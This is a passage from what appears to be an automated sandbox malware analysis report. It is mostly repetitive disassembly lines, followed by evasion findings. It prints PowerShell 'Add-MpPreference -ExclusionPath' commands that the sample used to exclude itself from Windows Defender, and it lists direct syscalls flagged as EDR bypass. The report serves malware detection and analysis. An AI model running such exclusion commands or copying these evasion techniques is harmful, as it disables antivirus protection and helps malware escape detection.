            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]8_2_017DA6C7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA6C7 mov eax, dword ptr fs:[00000030h]8_2_017DA6C7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D66B0 mov eax, dword ptr fs:[00000030h]8_2_017D66B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC6A6 mov eax, dword ptr fs:[00000030h]8_2_017DC6A6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186866E mov eax, dword ptr fs:[00000030h]8_2_0186866E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186866E mov eax, dword ptr fs:[00000030h]8_2_0186866E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4690 mov eax, dword ptr fs:[00000030h]8_2_017A4690
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4690 mov eax, dword ptr fs:[00000030h]8_2_017A4690
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E096E mov eax, dword ptr fs:[00000030h]8_2_017E096E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E096E mov edx, dword ptr fs:[00000030h]8_2_017E096E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E096E mov eax, dword ptr fs:[00000030h]8_2_017E096E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C6962 mov eax, dword ptr fs:[00000030h]8_2_017C6962
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C6962 mov eax, dword ptr fs:[00000030h]8_2_017C6962
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C6962 mov eax, dword ptr fs:[00000030h]8_2_017C6962
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018289B3 mov esi, dword ptr fs:[00000030h]8_2_018289B3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018289B3 mov eax, dword ptr fs:[00000030h]8_2_018289B3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018289B3 mov eax, dword ptr fs:[00000030h]8_2_018289B3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018369C0 mov eax, dword ptr fs:[00000030h]8_2_018369C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A9D3 mov eax, dword ptr fs:[00000030h]8_2_0186A9D3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798918 mov eax, dword ptr fs:[00000030h]8_2_01798918
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798918 mov eax, dword ptr fs:[00000030h]8_2_01798918
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182E9E0 mov eax, dword ptr fs:[00000030h]8_2_0182E9E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D29F9 mov eax, dword ptr fs:[00000030h]8_2_017D29F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D29F9 mov eax, dword ptr fs:[00000030h]8_2_017D29F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E908 mov eax, dword ptr fs:[00000030h]8_2_0181E908
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E908 mov eax, dword ptr fs:[00000030h]8_2_0181E908
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182C912 mov eax, dword ptr fs:[00000030h]8_2_0182C912
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182892A mov eax, dword ptr fs:[00000030h]8_2_0182892A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0183892B mov eax, dword ptr fs:[00000030h]8_2_0183892B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA9D0 mov eax, dword ptr fs:[00000030h]8_2_017AA9D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D49D0 mov eax, dword ptr fs:[00000030h]8_2_017D49D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820946 mov eax, dword ptr fs:[00000030h]8_2_01820946
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874940 mov eax, dword ptr fs:[00000030h]8_2_01874940
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A09AD mov eax, dword ptr fs:[00000030h]8_2_017A09AD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A09AD mov eax, dword ptr fs:[00000030h]8_2_017A09AD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 mov eax, dword ptr fs:[00000030h]8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01844978 mov eax, dword ptr fs:[00000030h]8_2_01844978
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01844978 mov eax, dword ptr fs:[00000030h]8_2_01844978
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182C97C mov eax, dword ptr fs:[00000030h]8_2_0182C97C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182C89D mov eax, dword ptr fs:[00000030h]8_2_0182C89D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4859 mov eax, dword ptr fs:[00000030h]8_2_017A4859
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4859 mov eax, dword ptr fs:[00000030h]8_2_017A4859
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D0854 mov eax, dword ptr fs:[00000030h]8_2_017D0854
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B2840 mov ecx, dword ptr fs:[00000030h]8_2_017B2840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018708C0 mov eax, dword ptr fs:[00000030h]8_2_018708C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov eax, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov eax, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov eax, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov ecx, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov eax, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2835 mov eax, dword ptr fs:[00000030h]8_2_017C2835
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA830 mov eax, dword ptr fs:[00000030h]8_2_017DA830
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A8E4 mov eax, dword ptr fs:[00000030h]8_2_0186A8E4
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC8F9 mov eax, dword ptr fs:[00000030h]8_2_017DC8F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC8F9 mov eax, dword ptr fs:[00000030h]8_2_017DC8F9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182C810 mov eax, dword ptr fs:[00000030h]8_2_0182C810
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE8C0 mov eax, dword ptr fs:[00000030h]8_2_017CE8C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184483A mov eax, dword ptr fs:[00000030h]8_2_0184483A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184483A mov eax, dword ptr fs:[00000030h]8_2_0184483A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182E872 mov eax, dword ptr fs:[00000030h]8_2_0182E872
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182E872 mov eax, dword ptr fs:[00000030h]8_2_0182E872
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836870 mov eax, dword ptr fs:[00000030h]8_2_01836870
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836870 mov eax, dword ptr fs:[00000030h]8_2_01836870
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0887 mov eax, dword ptr fs:[00000030h]8_2_017A0887
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179CB7E mov eax, dword ptr fs:[00000030h]8_2_0179CB7E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01798B50 mov eax, dword ptr fs:[00000030h]8_2_01798B50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01854BB0 mov eax, dword ptr fs:[00000030h]8_2_01854BB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01854BB0 mov eax, dword ptr fs:[00000030h]8_2_01854BB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184EBD0 mov eax, dword ptr fs:[00000030h]8_2_0184EBD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CEB20 mov eax, dword ptr fs:[00000030h]8_2_017CEB20
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CEB20 mov eax, dword ptr fs:[00000030h]8_2_017CEB20
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182CBF0 mov eax, dword ptr fs:[00000030h]8_2_0182CBF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CEBFC mov eax, dword ptr fs:[00000030h]8_2_017CEBFC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874B00 mov eax, dword ptr fs:[00000030h]8_2_01874B00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8BF0 mov eax, dword ptr fs:[00000030h]8_2_017A8BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8BF0 mov eax, dword ptr fs:[00000030h]8_2_017A8BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8BF0 mov eax, dword ptr fs:[00000030h]8_2_017A8BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181EB1D mov eax, dword ptr fs:[00000030h]8_2_0181EB1D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01868B28 mov eax, dword ptr fs:[00000030h]8_2_01868B28
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01868B28 mov eax, dword ptr fs:[00000030h]8_2_01868B28
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0BCD mov eax, dword ptr fs:[00000030h]8_2_017A0BCD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0BCD mov eax, dword ptr fs:[00000030h]8_2_017A0BCD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0BCD mov eax, dword ptr fs:[00000030h]8_2_017A0BCD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h]8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h]8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h]8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836B40 mov eax, dword ptr fs:[00000030h]8_2_01836B40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836B40 mov eax, dword ptr fs:[00000030h]8_2_01836B40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0BBE mov eax, dword ptr fs:[00000030h]8_2_017B0BBE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0BBE mov eax, dword ptr fs:[00000030h]8_2_017B0BBE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186AB40 mov eax, dword ptr fs:[00000030h]8_2_0186AB40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01848B42 mov eax, dword ptr fs:[00000030h]8_2_01848B42
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01854B4B mov eax, dword ptr fs:[00000030h]8_2_01854B4B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01854B4B mov eax, dword ptr fs:[00000030h]8_2_01854B4B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h]8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h]8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h]8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h]8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184EB50 mov eax, dword ptr fs:[00000030h]8_2_0184EB50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874A80 mov eax, dword ptr fs:[00000030h]8_2_01874A80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h]8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h]8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h]8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0A5B mov eax, dword ptr fs:[00000030h]8_2_017B0A5B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0A5B mov eax, dword ptr fs:[00000030h]8_2_017B0A5B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h]8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C4A35 mov eax, dword ptr fs:[00000030h]8_2_017C4A35
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C4A35 mov eax, dword ptr fs:[00000030h]8_2_017C4A35
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CEA2E mov eax, dword ptr fs:[00000030h]8_2_017CEA2E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DCA24 mov eax, dword ptr fs:[00000030h]8_2_017DCA24
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182CA11 mov eax, dword ptr fs:[00000030h]8_2_0182CA11
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DAAEE mov eax, dword ptr fs:[00000030h]8_2_017DAAEE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DAAEE mov eax, dword ptr fs:[00000030h]8_2_017DAAEE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0AD0 mov eax, dword ptr fs:[00000030h]8_2_017A0AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D4AD0 mov eax, dword ptr fs:[00000030h]8_2_017D4AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D4AD0 mov eax, dword ptr fs:[00000030h]8_2_017D4AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h]8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h]8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h]8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8AA0 mov eax, dword ptr fs:[00000030h]8_2_017A8AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8AA0 mov eax, dword ptr fs:[00000030h]8_2_017A8AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F6AA4 mov eax, dword ptr fs:[00000030h]8_2_017F6AA4
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184EA60 mov eax, dword ptr fs:[00000030h]8_2_0184EA60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D8A90 mov edx, dword ptr fs:[00000030h]8_2_017D8A90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181CA72 mov eax, dword ptr fs:[00000030h]8_2_0181CA72
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181CA72 mov eax, dword ptr fs:[00000030h]8_2_0181CA72
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryInformationToken: Direct from: 0x76F02CAC
